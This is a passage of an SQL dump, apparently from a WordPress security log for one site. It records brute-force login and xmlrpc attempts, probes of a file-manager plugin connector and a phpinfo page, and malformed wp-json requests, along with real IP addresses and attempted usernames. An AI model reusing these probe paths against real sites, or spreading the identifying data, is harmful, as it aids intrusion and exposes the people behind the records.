05.185.116.156',3451483292,'newd',0,1664824107.6441,7,'aFRLj2c39rEbIvJKGt1NAul6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.182.57.45',3115727149,'newd',0,1664824233.1457,152,'XxjZIcH8JGV7UCenABWym03i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.189.176.172',1539158188,'newd',0,1664824233.1840,152,'gFxOf7pTK241PqnrX0id6WYt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.169.144.135',1370067079,'newd',0,1664824234.3069,152,'R0i4D3cHSkunwVMTWysZ1aX8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.138.188.142',1737145486,'newd',0,1664824244.2902,152,'3BxfcEiDnbZ8MIplLo6JKWsz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.198.134.153',2412152473,'newd',0,1664824245.2827,152,'QwCZcYrFA6IVaPiB7mNTX3fl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664824252.5207,152,'S1gEpxqC2yRGLjlYcdZWQuzX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.207.63',2160578367,'newd',0,1664824256.0772,152,'L2dVeSwlzFRpt4nP67fyCuDo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664824258.7795,152,'o0GCurNAIFkTRqldwY8UtX4s','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.190.117.244',1354659316,'newd',0,1664824262.4452,7,'G53DOfgAcHME4F60bht7xpLP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.75.65.218',575357402,'newd',0,1664824285.6840,7,'4kq6LiwsNY1fjFa7mUDnxZrz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1664825067.1661,7,'5dLyrpaDqoBJ1UV7Qex0M38c','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1664825075.3904,7,'6JiWsoGBheZP0wE8VI2N9USj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664825849.2853,7,'yw5ZTCxLcbEiv7WQIS8Hdzlf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.44.8',2649107464,'newd',0,1664825873.0367,7,'169tX7vzYHe5LUAlyKW0JRuT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('1.117.250.215',24509143,'newd',0,1664826648.3698,7,'dTUtm6B4qXSn1g5Pkacj9eb7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('36.94.142.166',610176678,'newd',0,1664826665.9069,7,'EXaIprKvDy1nqxtP6GgJwuBY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1664826860.7702,7,'cPqpHFOQMhAs6LBJ4z2WGdDv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1664827437.0919,7,'4rYQg3vBsntoawuR9ePzf1mD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1664827459.6500,7,'nRjEgJfIYB3v1Cy4OXbWpxHL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.180.18',3497112594,'newd',0,1664828258.1994,7,'vxQFRWLu7zrYsVT4eHAnwqCh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.220.143',861658255,'newd',0,1664828264.6962,7,'c6n4G1yLWJYgd2Cqe0EvSzRN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.129.222.91',1736564315,'newd',0,1664829063.9725,7,'9nX8sFkYwJVz0ZteLagxM3UQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1664829069.5761,7,'TRdV7uOtNS9I1i2scqz8gY0h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('166.62.125.246',2789113334,'newd',0,1664829864.2890,7,'He8Yz2ARqEh34uGI0otb16dc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.247.249.96',2918709600,'newd',0,1664829871.6622,7,'mD7VzIKkH4v1pga962ePCSLl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664830001.8366,152,'7mdtMC1xEfzLFinB3VYPjQ68','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.161.6',1556979974,'newd',0,1664830001.8892,152,'NL9kxuE1ZWfUiDTpzPMVG7Xm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.136.232.254',3246975230,'newd',0,1664830001.8950,152,'OebRNWilYFScKxAI8o5gV2Tk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664830055.1274,152,'pwGOmfuTEBcaFIADgSQoWdMy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.119.82.214',762794710,'newd',0,1664830055.2837,152,'1MFzyVahD3IPYvSfBOtHbWJ5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.23',3103917079,'newd',0,1664830057.0245,152,'WlfFz2xpEJ50mB8P1sUAZQ6q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.212.229.33',2111104289,'newd',0,1664830064.8815,152,'ZXaAlMKIjJO1bguideqntL4H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.99.149.60',2338559292,'newd',0,1664830065.3136,152,'hfpq7wV62KLWGFMD45AOj01c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.61.188.225',759020769,'newd',0,1664830547.5364,7,'rmADPyopiIMJ7NbxFYC8R9wO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1664830664.4928,7,'Noy5J8FphAitfXPZ01qz2uKH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.82.122',2335920762,'newd',0,1664830672.5536,7,'FrKwGUYIaVdPXnMstQqB7Ou2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.78.47.249',2471374841,'',0,1664831004.9069,55,'r7dPtebV2pQWh5XnF0ivx9jG','','19|0|0|0|cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('212.103.4.29',3563521053,'newd',0,1664831464.8996,7,'fNhESVAT6nPqucbotLg0JYlj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('133.130.103.36',2239915812,'newd',0,1664831471.4840,7,'ucySaCmrQEGBp26VfiYjtM5U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664831846.9693,152,'AbuiZgtKX7yGJq1we6QD9RTF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.10.82',3496806994,'newd',0,1664831847.0895,152,'0bWK3aysBUfIM4niXLTzO8Nm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.18.25.1',2232555777,'newd',0,1664831847.0961,152,'zVBiSCnwWNIEPqbL0uY6h2Tv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.161.6',1556979974,'newd',0,1664831857.2308,152,'std857WFnYflHkhpqrxIZ0yP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664831867.9143,152,'gaPUcYl72fJun1bSZoBNQHVD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.207.63',2160578367,'newd',0,1664831868.6283,152,'zBeOTn31VvJ0WfQIGrSkUsMN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.129.81.132',729895300,'admin',0,1664831906.0095,152,'2gawMk1urYDoyGWclVBvF8eR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.51.19',883700499,'admin',0,1664831906.5057,152,'8WZvPNIX0DqYQKL6xj2cAplg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'admin',0,1664831911.4554,152,'qdU5nsz3TigetS8ADB0X6R7h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1664832267.7616,7,'QkaLGhJgTb8CfW5x073NZsjS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.198.112',2769733232,'newd',0,1664832274.6910,7,'ctIS7UqsGLE1moyM64jzeYnp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1664833071.0994,7,'tzPm6kgCcjOV3WMwZry1fuJi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1664833078.3026,7,'L5QCuY7stw0eZiNPHVD63vyB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1664833871.1547,7,'IAraJ3ctxd2KOj4gFQ8lsVRL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1664833878.1861,7,'uJF2zETykb4Ki35XIPgNeCnY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.196.155.194',2344917954,'admin',0,1664834149.3733,152,'LehTCXxyDNA8pvuF4PJVbKZc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.208.99.2',1540383490,'camarco.org',0,1664834152.9124,152,'qKMWNJ7uzAGYxL19vf2lcCO0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.22.153.127',1410767231,'chatpattinews',0,1664834172.3350,152,'F4BNIuVj8cfXq1Lkb3rMPlEo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.117.225',2806478305,'newd',0,1664834665.9557,7,'CRpyxBwPbuMWDhiF5rST9sVt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.143.36',2680917796,'newd',0,1664834689.9272,7,'qIi4SrByE6TZCQsOcnLWud0A','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.83.144.103',3109261415,'',0,1664835391.0382,55,'msKS4L2glyCqn7aYF0ZziWcG','','19|0|0|0|cteisys.com/sysinfo_phpinfo.php',0,19,0),('185.83.144.103',3109261415,'',0,1664835391.0355,55,'lZQce4V8BMvfnTSKgu0UaJF7','','19|0|0|0|cteisys.com/sysinfo_phpinfo.php',0,19,0),('80.190.117.244',1354659316,'newd',0,1664835481.0465,7,'07ipWTogafvL91xn4uHyZes8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.69.109.132',574975364,'newd',0,1664835499.4224,7,'NZnjfVDOWmSJYyKTrzEqd7Xv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.235',3497105899,'newd',0,1664836299.9014,7,'DjKZTxUgLcr2A7d1bFpenXs3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.247.248.182',2918709430,'newd',0,1664836307.4687,7,'PD3wFhxASJuoqm7flBOEyMCz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1664837090.8942,7,'9zsKpM4da65gAmniLjfODqEJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.35.52.207',2703439055,'newd',0,1664837114.3704,7,'NIbvC6x80HhjDGQBeAqy7X4T','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('8.142.173.121',143568249,'newd',0,1664837915.0260,7,'XstCR2ngDqaOGrVj4IPQHMux','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.134',3103917190,'newd',0,1664837922.0960,7,'dCqG4jQfUJOoLB9evlkuzDA2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.14.89',1807552089,'newd',0,1664838570.1259,7,'lwJ6FPytBqAfYj5d2gnEb0ZK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.68.76.32',574901280,'newd',0,1664838728.6729,7,'EaMJ3qxTFmcfB0t5Lwb7HsuD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.190.117.244',1354659316,'newd',0,1664838734.1981,7,'aJKwxn1QVoq9G8gcPUkCBLYd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.85.126',3642054014,'newd',0,1664839074.2188,152,'37ZXLcq0U1Jxdz6uP4iMBrWI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.94.219.115',794745715,'newd',0,1664839074.2321,152,'jSuHrRi5sVla2LUegEdfT1P7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.219.230.121',2329667193,'newd',0,1664839074.4252,152,'pdX0rJQ5zNlwhaeq4g7WKC1A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664839078.6911,152,'GvcoILzCQxRNUiBWPd1rHFS9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.119.82.214',762794710,'newd',0,1664839080.1528,152,'nF7uTkJ29HwXaPcLpIGdAyji','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.27.156.245',3256589557,'newd',0,1664839085.3094,152,'aw89vdc5Wpy62ADkJPXUxE7m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.85.126',3642054014,'newd',0,1664839090.2669,152,'Mr2UaCGB6LQJnh0zpXueYx8V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664839092.2847,152,'HgOhUBwi3NLWseQSdJvAV5FE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'newd',0,1664839101.5937,152,'49rUV6Km01GXelCTaufIdcBj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.232.14.51',3118992947,'newd',0,1664839102.1588,152,'3uTl1Pw4mBtGZvMgXN9bDEIq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('27.72.145.33',457740577,'newd',0,1664839544.8430,7,'rktdnJWuGYQajyw2m1SfDMgB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.38.73.235',908478955,'newd',0,1664839551.0347,7,'rX9kCObgMNveD1dTqIFya3Jn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1664840342.5482,7,'mUIlhbYvWPRJaysxNGKB9Cgu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.110.92.155',3564002459,'newd',0,1664840367.7064,7,'LrfIVpP0H7UE6htvdnTiYgBK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.200.8.180',3485993140,'',0,1664840544.8929,10,'RF3s5f9lea0TZt7pivywhnCj','','711|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/repairs%5C/%5C%22',0,711,0),('207.200.8.180',3485993140,'',0,1664840546.3370,70,'1WVZKb5LGnJFl6SOTMIyRkYm','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840547.4533,70,'02cuJIvnfG7YTOX38aNSwPhy','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840548.7208,70,'AvGlTCYySDx6Va03jnbzfo2Q','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/repair1.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840549.7821,70,'6yIqH4omWQn1bBKu3FdgCNiG','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/repair1.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840550.5501,70,'ngNWth5yUrvKxwYPM3iuZka2','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img1.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840552.0218,70,'c2jbPfHRA0zVBYK1diGNse5E','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img1.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840553.0406,70,'mZcGkNzDSqn3R51v9Ub0twK7','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840554.7680,70,'vEnSP5zdeoculWDKRmtMX8Hk','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840555.6505,70,'bwUft2jcrKy19vTMedNZEgSO','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/gutters%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840556.5628,70,'t9xL4Svn3olEbJ7jcdiGDqO1','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/gutters%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840560.4744,70,'veE6O8gGQImZTklMX9CSzJAU','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/email-icon.png%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840561.2847,70,'0zIJY4Gu2iPblZHUyX85CKsA','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/email-icon.png%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840562.0497,70,'41Psz8AE5gicdlyHWxjLTXeM','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/gallery%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840562.9065,70,'8mynbLtJp5D209HxqlG4IAUY','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/gallery%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840563.7251,70,'u4rZNe6K7aDS2nQ5EkTgRCm9','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/slider3-1024x597.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840564.8452,70,'xTZEOH9P0QMFDzV2v6GCo5Kk','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/slider3-1024x597.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840565.7208,70,'c9jJ5VMskWgOlSBxU7D0TdG4','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/contact',0,13,0),('207.200.8.180',3485993140,'',0,1664840566.9172,70,'8C2Vxk3KYEbTrjlDIyuPpcmX','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/dunriteroof.com%5C/contact',0,13,0),('207.200.8.180',3485993140,'',0,1664840568.9843,70,'qfc9bihvCFnjGYPkza5xHLET','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/tiling%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840570.3403,70,'oAwLpVuyz8eFJ7rHCKtb5mY9','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/tiling%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840571.0695,100,'j2HW30iLK8yI71mqXAzxu4QD','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840571.8356,100,'MT4ocdba9mzSsfEqt7uy1Oph','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840572.6756,70,'hG3IBxsourSEnbZJzUagkpcA','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/roofing.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840573.7094,70,'6Dt0R4JN7WqTKz5QE9rM3ily','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/roofing.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840575.0971,70,'GmAukWVn7FpBO6M1yJrqaf4H','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img3.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840576.5040,70,'pFeD8VJXC6ElmkYguxorsIMQ','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img3.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840577.3253,70,'kOlTXx3VajUfiCQmy50L1szF','','13|0|0|0|cteisys.com/wp-json/',0,13,0),('207.200.8.180',3485993140,'',0,1664840578.9735,70,'iAVmzWIrXKwJRu1G8etDSHCf','','13|0|0|0|cteisys.com/wp-json/',0,13,0),('207.200.8.180',3485993140,'',0,1664840580.0359,70,'VMr6kX4HusBzwQb1dCDRLOoE','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/Capture.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840581.6287,70,'4kzRQME7xWXLoucy3wgaHpUS','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2022%5C/08%5C/Capture.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840595.7729,70,'JfL3MPsH2ze8w5QXytxZUDlv','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/roofing%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840599.5671,70,'bHxPlRACBhXmMtsy3QLnjDVY','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/services%5C/roofing%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840600.7124,70,'8Sef24wZxkEyoGF9TBv71qsC','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/embed%5C/',0,13,0),('207.200.8.180',3485993140,'',0,1664840602.3329,70,'nIU9cGs2u3XQJHf7FRyoLN6d','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/%5C/%5C/cteisys.com%5C/services%5C/insurance%5C/embed%5C/',0,13,0),('207.200.8.180',3485993140,'',0,1664840604.4180,70,'XkJ9rAn4Dmi2KhotEQbWPz6s','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/roofing%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840605.4148,70,'RVweJubrpA5q0ly3W8n1dhQL','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/services%5C/roofing%5C/%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840607.0707,70,'AZyX7DucgJPzNvVYlki5Idaw','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/services-img3.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840608.1453,70,'1NovYxfjc4VkLByERZU0hbQl','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/services-img3.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840609.1796,100,'C5ZmnM1qvjw7Gfc2hz3QsTJN','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840610.0780,100,'jDGa2cqlyb5Vpo0Qsm9wUtCR','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840610.7904,100,'vjpaE3GB7cD8xRZ5tbHysX9Y','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840611.8337,100,'04F5hD3m71nUOMElPeWIzxVk','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840612.7737,100,'klEs495UyjxA7JBudZ23WCqp','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840614.0413,100,'dJXlsWpD7NbwxZLE3inFhy6f','','13|0|0|0|cteisys.com/wp-json/oembed/1.0/embed',0,13,0),('207.200.8.180',3485993140,'',0,1664840615.2164,70,'ViO0BIb6e4c8u13dEpqg2FYz','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/team-member1-150x150.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840616.5244,70,'8Id3e59NzBgTLU6mO02DPXKn','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/sktperfectdemo.com%5C/themepack%5C/gbrenovate%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/team-member1-150x150.jpg%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840617.4478,70,'8QIFYv2lm05B7JeKUyGxOHqS','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img2.png%5C%22',0,13,0),('207.200.8.180',3485993140,'',0,1664840619.0346,70,'ATNSiEluqptxWbcgy6Vzw0H7','','13|0|0|0|cteisys.com/wp-json/wp/v2/pages/%5C/%5C/cteisys.com%5C/wp-content%5C/uploads%5C/2021%5C/05%5C/project-img2.png%5C%22',0,13,0),('14.225.255.250',249692154,'newd',0,1664841204.1055,7,'DOFzSt0YgJkl5fMbZChxQ3er','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.236.184.116',2917972084,'newd',0,1664841993.5120,7,'boOzlTAVcPWYJFuxSH5M72ek','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.42.231.47',2032854831,'newd',0,1664842000.4451,7,'AZQv8xNiL4EwIMgmSWtkFVOd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.142.148.198',864982214,'newd',0,1664842315.6525,152,'V3sOfnuXvHPYe0WAr4ZozEqK','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1664842812.3269,7,'7REwfj3K9qaYbHsBrUclDtOi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.195.254.123',3351510651,'nathaniel-lipka',0,1664842994.7950,51,'kyjhX7MQrCtIdgToY9vpLSiB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.156',3451483292,'newd',0,1664843489.5980,7,'rK81qWBdwusoSfjC4aLeTQFk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.17.172.162',772910242,'newd',0,1664843499.6689,152,'DThomFVCeGIfBNlXi9bSO1WJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.226.37.184',3403818424,'newd',0,1664843505.1105,152,'hLjAdmN6qzrlU23GY7RsKfbH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664843506.8659,152,'fEqZQb9Vtdj8TFCwhNM2rBp5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.189.176.172',1539158188,'newd',0,1664843512.3086,152,'3Wt6TQlNFKaiqgG1H0ukbsIv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664843526.2125,152,'PDI6wVvZXRsnFzSm0JxNrA8C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.55.131.89',2721547097,'newd',0,1664843528.5766,152,'Gu3PDsW5OUhwpKN62t1FzoLA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.161.119.55',94467895,'newd',0,1664843532.9479,152,'6fFGhKTXqODiopMStjey40IV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.93.129',3324927361,'newd',0,1664843538.1930,152,'UV3iuLHaQzrekYFApX72IP6D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.25.21.16',2065241360,'newd',0,1664843620.5545,7,'yq3ePxu8XmDn4jlfiYhQwrF